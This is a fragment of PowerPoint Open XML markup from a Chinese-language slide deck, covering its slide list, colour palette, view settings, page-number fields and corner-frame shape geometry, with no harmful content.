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7" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId36"/>
  </p:notesMasterIdLst>
  <p:handoutMasterIdLst>
    <p:handoutMasterId r:id="rId37"/>
  </p:handoutMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="9228" r:id="rId2"/>
    <p:sldId id="9234" r:id="rId3"/>
    <p:sldId id="9217" r:id="rId4"/>
    <p:sldId id="9231" r:id="rId5"/>
    <p:sldId id="9229" r:id="rId6"/>
    <p:sldId id="9331" r:id="rId7"/>
    <p:sldId id="9332" r:id="rId8"/>
    <p:sldId id="9333" r:id="rId9"/>
    <p:sldId id="9236" r:id="rId10"/>
    <p:sldId id="9349" r:id="rId11"/>
    <p:sldId id="9306" r:id="rId12"/>
    <p:sldId id="9233" r:id="rId13"/>
    <p:sldId id="9305" r:id="rId14"/>
    <p:sldId id="9218" r:id="rId15"/>
    <p:sldId id="9334" r:id="rId16"/>
    <p:sldId id="9314" r:id="rId17"/>
    <p:sldId id="9335" r:id="rId18"/>
    <p:sldId id="9336" r:id="rId19"/>
    <p:sldId id="9315" r:id="rId20"/>
    <p:sldId id="9337" r:id="rId21"/>
    <p:sldId id="9232" r:id="rId22"/>
    <p:sldId id="9338" r:id="rId23"/>
    <p:sldId id="9339" r:id="rId24"/>
    <p:sldId id="9316" r:id="rId25"/>
    <p:sldId id="9340" r:id="rId26"/>
    <p:sldId id="9341" r:id="rId27"/>
    <p:sldId id="9346" r:id="rId28"/>
    <p:sldId id="9347" r:id="rId29"/>
    <p:sldId id="9351" r:id="rId30"/>
    <p:sldId id="9352" r:id="rId31"/>
    <p:sldId id="9344" r:id="rId32"/>
    <p:sldId id="9342" r:id="rId33"/>
    <p:sldId id="9343" r:id="rId34"/>
    <p:sldId id="9345" r:id="rId35"/>
  </p:sldIdLst>
  <p:sldSz cx="12858750" cy="7232650"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:custDataLst>
    <p:tags r:id="rId38"/>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0A3"/>
    <a:srgbClr val="1092F1"/>
    <a:srgbClr val="007DFA"/>
    <a:srgbClr val="969696"/>
    <a:srgbClr val="2278F4"/>
    <a:srgbClr val="000000"/>
    <a:srgbClr val="FF3B5E"/>
    <a:srgbClr val="18A6FF"/>
    <a:srgbClr val="F2F2F2"/>
    <a:srgbClr val="4B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33" autoAdjust="0"/>
    <p:restoredTop sz="86691" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="58" d="100"/>
          <a:sy n="58" d="100"/>
        </p:scale>
        <p:origin x="885" y="48"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="328"/>
        <p:guide pos="4050"/>
        <p:guide pos="557"/>
        <p:guide orient="horz" pos="4183"/>
        <p:guide pos="7497"/>
        <p:guide pos="6908"/>
      </p:guideLst>
    </p:cSldViewPr>
  </p:slideViewPr>
  <p:outlineViewPr>
    <p:cViewPr>
      <p:scale>
        <a:sx n="100" d="100"/>
        <a:sy n="100" d="100"/>
      </p:scale>
      <p:origin x="0" y="0"/>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7" d="100"/>
          <a:sy n="67" d="100"/>
        </p:scale>
        <p:origin x="283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2019/12/12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2019/12/12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371290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val="1935374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804000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3756446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val="2875486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3977704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12861670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17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26929846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27720321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34678527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20</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3789058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2378327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21</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26878029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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36994600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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33565560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24</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2141550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25</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12296738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26</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31134953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27</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2881284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28</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16584838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29</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13210391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30</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2973747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42270499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31</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32482400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32</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28330296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33</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34049130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34</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2689278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3109515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1225682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3146388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2235312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1925553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40025676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xmlns="" id="{6B58CA9C-A61B-4218-B89C-765C4AE4CBCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="12858243" cy="7232650"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="11520489" cy="6480175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="矩形 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{EAE98536-CFB6-41B1-A838-44066568C945}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="71612" y="71736"/>
              <a:ext cx="11377264" cy="6336703"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:sysClr val="window" lastClr="FFFFFF">
                  <a:lumMod val="65000"/>
                </a:sysClr>
              </a:solid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任意多边形: 形状 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{DBBE4815-B6B0-4394-BC94-8AAD066B124D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000" flipH="1">
              <a:off x="275597" y="-275598"/>
              <a:ext cx="1403883" cy="1955080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1573594 h 1955080"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 1955080 h 1955080"/>
                <a:gd name="connsiteX2" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 1859708 h 1955080"/>
                <a:gd name="connsiteX3" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX4" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX5" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX6" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX7" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX8" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX9" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX10" fmla="*/ 1022396 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX11" fmla="*/ 1022395 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 1 h 1955080"/>
                <a:gd name="connsiteX12" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 1 h 1955080"/>
                <a:gd name="connsiteX13" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1573594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0" y="1573594"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1955080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1859708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1403883" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022396" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022395" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1573594"/>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8" name="任意多边形: 形状 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{47B1F7C7-679E-4D38-A62B-40F1A8E86F21}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="9843121" y="4802808"/>
              <a:ext cx="1403883" cy="1950851"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1950851 h 1950851"/>
                <a:gd name="connsiteX1" fmla="*/ 1022396 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 1950851 h 1950851"/>
                <a:gd name="connsiteX2" fmla="*/ 1022395 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 1950850 h 1950851"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 1950850 h 1950851"/>
                <a:gd name="connsiteX4" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 1903165 h 1950851"/>
                <a:gd name="connsiteX5" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 1903165 h 1950851"/>
                <a:gd name="connsiteX6" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 381486 h 1950851"/>
                <a:gd name="connsiteX7" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 234161 h 1950851"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 1950851"/>
                <a:gd name="connsiteX9" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 95372 h 1950851"/>
                <a:gd name="connsiteX10" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 234161 h 1950851"/>
                <a:gd name="connsiteX11" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 476858 h 1950851"/>
                <a:gd name="connsiteX12" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 1855479 h 1950851"/>
                <a:gd name="connsiteX13" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 1855479 h 1950851"/>
                <a:gd name="connsiteX14" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 1855480 h 1950851"/>
                <a:gd name="connsiteX15" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1855480 h 195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0851">
                  <a:moveTo>
                    <a:pt x="1403883" y="1950851"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1022396" y="1950851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1022395" y="1950850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1950850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="1903165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1903165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="381486"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="234161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="234161"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="476858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1855479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1855479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1855480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="1855480"/>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9" name="任意多边形: 形状 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{63C32D3D-90D7-4CB2-BA03-C77D89B0E7E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="9840777" y="-275599"/>
              <a:ext cx="1403883" cy="1955081"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1716692 h 1955081"/>
                <a:gd name="connsiteX1" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 47687 h 1955081"/>
                <a:gd name="connsiteX2" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 47687 h 1955081"/>
                <a:gd name="connsiteX3" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 0 h 1955081"/>
                <a:gd name="connsiteX4" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 1955081"/>
                <a:gd name="connsiteX5" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 1 h 1955081"/>
                <a:gd name="connsiteX6" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 1 h 1955081"/>
                <a:gd name="connsiteX7" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 95372 h 1955081"/>
                <a:gd name="connsiteX8" fmla="*/ 927024 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 95372 h 1955081"/>
                <a:gd name="connsiteX9" fmla="*/ 927025 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 95371 h 1955081"/>
                <a:gd name="connsiteX10" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 95371 h 1955081"/>
                <a:gd name="connsiteX11" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 1478223 h 1955081"/>
                <a:gd name="connsiteX12" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 1478223 h 1955081"/>
                <a:gd name="connsiteX13" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 1859709 h 1955081"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 1955081 h 1955081"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1716692 h 1955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1">
                  <a:moveTo>
                    <a:pt x="0" y="1716692"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="47687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="47687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1403883" y="1"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927024" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927025" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1478223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1478223"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1859709"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1955081"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1716692"/>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0" name="任意多边形: 形状 19">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{3F697906-39C1-47C3-ADE4-53420E13B68E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="275598" y="4800693"/>
              <a:ext cx="1403883" cy="1955080"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 1403883 w 1403883"/>
                <a:gd name="connsiteY0" fmla="*/ 1 h 1955080"/>
                <a:gd name="connsiteX1" fmla="*/ 1308511 w 1403883"/>
                <a:gd name="connsiteY1" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX2" fmla="*/ 927024 w 1403883"/>
                <a:gd name="connsiteY2" fmla="*/ 95372 h 1955080"/>
                <a:gd name="connsiteX3" fmla="*/ 927025 w 1403883"/>
                <a:gd name="connsiteY3" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX4" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY4" fmla="*/ 95371 h 1955080"/>
                <a:gd name="connsiteX5" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY5" fmla="*/ 1478222 h 1955080"/>
                <a:gd name="connsiteX6" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY6" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX7" fmla="*/ 95371 w 1403883"/>
                <a:gd name="connsiteY7" fmla="*/ 1859708 h 1955080"/>
                <a:gd name="connsiteX8" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY8" fmla="*/ 1955080 h 1955080"/>
                <a:gd name="connsiteX9" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY9" fmla="*/ 1716691 h 1955080"/>
                <a:gd name="connsiteX10" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY10" fmla="*/ 1573594 h 1955080"/>
                <a:gd name="connsiteX11" fmla="*/ 0 w 1403883"/>
                <a:gd name="connsiteY11" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX12" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY12" fmla="*/ 47686 h 1955080"/>
                <a:gd name="connsiteX13" fmla="*/ 1 w 1403883"/>
                <a:gd name="connsiteY13" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX14" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY14" fmla="*/ 0 h 1955080"/>
                <a:gd name="connsiteX15" fmla="*/ 1138962 w 1403883"/>
                <a:gd name="connsiteY15" fmla="*/ 1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1403883" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1308511" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927024" y="95372"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927025" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="95371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1478222"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95371" y="1859708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1955080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1716691"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1573594"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="47686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1138962" y="1"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{85F87891-8299-4375-87F6-4940389DCE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1819" y="0"/>
            <a:ext cx="11875110" cy="7232650"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2027119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1AD2B354-15D3-4C8A-85D2-33CEBD4C936C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{32BF82D2-7A68-459D-A996-9BDDA2518FA4}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2019/12/12</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="页脚占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4C5F0C88-FD5F-4486-9D89-3C4F82CAA17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C7E7975B-E11E-4432-97B8-B813496B2D4D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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802390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4039" y="385072"/>
            <a:ext cx="11090672" cy="139797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4039" y="1925358"/>
            <a:ext cx="11090672" cy="458905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84039" y="6703595"/>
            <a:ext cx="2893219" cy="385072"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1266">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:tint val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
